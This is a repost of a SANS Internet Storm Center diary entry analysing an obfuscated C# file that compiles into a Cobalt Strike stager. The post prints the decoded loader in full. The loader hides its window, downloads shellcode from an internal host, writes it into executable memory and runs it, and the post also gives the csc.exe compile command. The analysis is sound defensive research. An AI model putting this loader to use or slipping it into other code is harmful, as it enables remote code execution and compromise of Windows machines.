CSharp Payload Phoning to a CobaltStrike Server, (Fri, Dec 15th)

This post was originally published on this site

I found an interesting CSharp source code on VT a few days ago. Its score is only 3/59 (SHA256:5aebf1369b9b54cfc340f34fcc61a90872085a2833fd9bcf238f7c62a5c7620a)[1].

It has been a long time since I saw payloads ready to be compiled. I did some research on self-compiling malware in 2020[2]. I think the file was uploaded on VT to verify the detection rate by AV vendors because the CobalStrike server is a private IP address. Or was it in the scope of some Red team exercise?

The code is obfuscated with junk characters that are removed during execution:

string pRVSczAKPboj = "u>(hs>(hi>(hn>(hg>(h
[...payload removed...]
>(h >(h0>(hx>(hF>(hF>(hF>(hF>(hF>(hF>(hF>(hF>(h)>(h;>(h}>(h}>(h}".Replace(">(h", "");

Here is the decoded payload, which is easy to understand:

using System;
using System.Net;
using System.Runtime.InteropServices;
namespace GnRiolRYuAcH 
{
    public class EpQmktOhiwXb 
    {
        [DllImport ("kernel32")] private static extern UInt64 VirtualAlloc (UInt64 zJAjSroWZVkI, UInt64 KaWcaAtEjRML, UInt64 PRZMeuJQylhj, UInt64 lDLVdityOBmY); 
        [DllImport ("kernel32")] private static extern IntPtr CreateThread (UInt64 NxVjPRlolSsT, UInt64 EZnBMZtLXzTZ, UInt64 mNXqHtnujBJm, IntPtr BVcXnWWYhroa, UInt64 rckVAtyTWXhW, ref UInt64 OUmSsFQyEEnY);
        [DllImport ("kernel32")] private static extern UInt64 WaitForSingleObject (IntPtr ucXgBIyufbdT, UInt64 nmJKJtodAzHm);
        [DllImport ("kernel32.dll)] static extern IntPtr GetConsoleWindow ();
        [DllImport ("user32.dll")] static extern bool ShowWindow (IntPtr holpJgOYqcKG, int viaQwLWOkGFp);
        public static void Main () 
        {
            ShowWindow (GetConsoleWindow (), 0);
            WebClient sbTBMGCfElPa = new System.Net.WebClient ();
            sbTBMGCfElPa.Headers.Add("User-Agent", "Mozilla/5.0 (compatible; MSIE 11.0; Trident/7.0; rv:11.0)");
            sbTBMGCfElPa.Headers.Add ("Accept", "*/*");
            sbTBMGCfElPa.Headers.Add ("Accept-Language", "en-gb,en;q=0.5");
            byte[] AjVmuebayNvb = null;
            AjVmuebayNvb = sbTBMGCfElPa.DownloadData ("hxxp://192[.]168[.]1[.]28:1234/Qm3k");
            byte[] BlAVsJsniHyM = new byte[AjVmuebayNvb.Length - 0];
            Array.Copy (AjVmuebayNvb, 0, BlAVsJsniHyM, 0, BlAVsJsniHyM.Length);
            UInt64 gltoUfDFqsfu = VirtualAlloc (0, (UInt64) BlAVsJsniHyM.Length, 0x1000, 0x40);
            Marshal.Copy (BlAVsJsniHyM, 0, (IntPtr) (gltoUfDFqsfu), BlAVsJsniHyM.Length);
            IntPtr wnvVIenBotAX = IntPtr.Zero;
            UInt64 DfVxARfvlcwx = 0;
            IntPtr YBKUjHKOUGUq = IntPtr.Zero;
            wnvVIenBotAX = CreateThread (0, 0, gltoUfDFqsfu, YBKUjHKOUGUq, 0, ref DfVxARfvlcwx);
            WaitForSingleObject (wnvVIenBotAX, 0xFFFFFFFF);
        }
    }
}

The behavior is classic: Some READ_WRITE_EXECUTE (0x40) memory is allocated, and the payload returned by the HTTP request to the internal IP is injected and started in a new thread.

This can be compiled and executed on any Windows computer with a .Net framework installed (read: 99% of them!)

C:WindowsMicrosoft.NETFrameworkv4.0.30319>csc.exe /t:exe /out:payload.exe c:usersremDesktoppJmOrSymbiAM.cs

Indeed, all of you have a compiler installed on your computers, even if you’re not developers!

Usually, this kind of code is written in Powershell, but this technique looks stealthier. Or maybe not! I uploaded my compiled file to VT, which got a bad score of 36/72[4].

[1] https://www.virustotal.com/gui/file/5aebf1369b9b54cfc340f34fcc61a90872085a2833fd9bcf238f7c62a5c7620a/detection
[2] https://www.sans.org/webcasts/atmic-talk-self-compiling-malware-114085/
[3] https://isc.sans.edu/diary/Finding+Metasploit+Cobalt+Strike+URLs/27204
[4] https://www.virustotal.com/gui/file/2bd26546e09eff4675d020dab3da4fc6cb08bad9637905ac792d16a4a8937bcf/detection

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.